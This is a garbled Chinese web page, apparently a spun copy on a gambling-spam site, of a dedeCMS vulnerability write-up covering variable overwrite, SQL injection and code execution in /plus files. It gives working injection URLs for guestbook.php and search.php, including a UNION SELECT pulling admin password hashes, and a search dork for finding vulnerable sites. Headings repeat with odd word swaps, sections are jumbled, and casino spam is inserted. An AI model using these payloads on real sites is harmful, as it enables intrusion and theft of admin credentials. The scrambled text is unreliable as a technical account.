xml地图|网站地图|网站标签 [设为首页] [加入收藏]

dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injectin

来源:http://www.ccidsi.com 作者:集成经验 人气:97 发布时间:2019-07-03
摘要:目录 catalog catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防

目录

catalog

catalog

1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考
1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考
1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考

 

 

 

1. 尾巴描述

1. 破绽描述

1. 纰漏描述

对于那几个漏洞,大家得以轻松总结如下

注射漏洞成功需求标准如下

以此文件有两处注入漏洞

1. "/plus/download.php"文件会引入"/include/common.inc.php"文件  2. "/include/common.inc.php"中会对用户输入的变量进行"变量本地注册",如果注册的变量未被显式地初始化,则会导致本地变量覆盖  3. "/include/common.inc.php"会引入"/include/dedesql.class.php"文件  4. 存在漏洞的"/include/dedesql.class.php","没有"对$arrs1、$arrs2这两个数组进行初始化,导致黑客可以通过外部的输入覆盖这2个变量  5. 黑客通过向"/plus/download.php"文件中POST入特殊构造的数据包,通过覆盖$arrs1、$arrs2这两个数组,最终污染"数据表前缀变量$cfg_",这个"数据表前缀变量$cfg_"会被带入数据库的SQL查询语句中,导致SQL注入  6. "/plus/ad_js.php"、"/plus/mytag_js.php"会从数据库中查询出刚才被注入的PHP Code,将写过写入缓存文件中,并include执行,最终导致代码执行
1. php magic_quotes_gpc=off  2. 漏洞文件存在: plus/guestbook.php  3. 在数据库中: dede_guestbook也需要存在
1. $typeid变量覆盖导致ChannelTypeid被强制改变: 低风险  2. $typeArr的本地变量覆盖注入 $typeid变量覆盖导致SQL注入: 高风险

**Relevant Link:**

**Relevant Link:**

皇家娱乐在线app,**Relevant Link:**

http://bbs.safedog.cn/thread-52264-1-1.html  http://www.2cto.com/Article/201205/129974.html  http://www.91ri.org/6462.html  http://phpinfo.me/2013/12/24/111.html
inurl:/plus/guestbook.php
http://graysb.diandian.com/post/2013-03-10/40049018798  http://0day5.com/archives/341

2. 漏洞触发条件

2. 纰漏触发条件

2. 尾巴触发条件

1. "/include/dedesql.class.php","没有"对$arrs1、$arrs2这两个数组进行初始化  2. "/plus/ad_js.php"、"/plus/mytag_js.php"未对从数据库查询出的数据进行有效过滤、检测
1. http://localhost/dedecms5.7/plus/guestbook.php  2. [回复/编辑]上可以看到访问者留言的ID。则记下ID,例如: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1  3. 访问: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=1  4. 提交后,如果是dede5.7版本的话,会出现"成功更改或回复一条留言",那就证明修改成功了   5. 再返回到: http://localhost/dedecms5.7/plus/guestbook.php,看下改的那条留言内容是否变为了 errs.cc’ 如果是的话,那就证明此漏洞无法再利用应为他开启: php magic_quotes_gpc=off  6. 如果没有修改成功,那留言ID的内容还是以前的,那就证明漏洞可以利用。  7. 那么再次访问: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=',msg=user(),email='  8. 然后返回,那条留言ID的内容就直接修改成了mysql 的user().

0x1: POC1

0x1: 手工业验证

**Relevant Link:** 

http://dede/plus/search.php?typeid=1&keyword=test  /*  在请求的时候URL中要带上keyword,因为在search.php中有对keyword的检测  if(($keyword=='' || strlen($keyword)<2) && empty($typeid))  {      ShowMsg('关键字不能小于2个字节!','-1');      exit();  }  */

皇家娱乐在线app 1

http://www.51php.com/dedecms/16942.html  http://www.wooyun.org/bugs/wooyun-2012-014501

0x2: POC2

3. 尾巴影响范围

http://localhost/dede/plus/search.php?typeArr[1 1=2union select pwd from dede_admin]=11&kwtype=0&q=11  //$typeArr的键本身是payload,keyword要和这个键的值相同

3. 破绽影响范围

0x1: POC

0x3: Safe Alert: Request Error step 2 !

本文由68399皇家赌场发布于集成经验,转载请注明出处:dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injectin

关键词: 68399皇家赌场

上一篇:结束时间大于开始时间

下一篇:没有了

最火资讯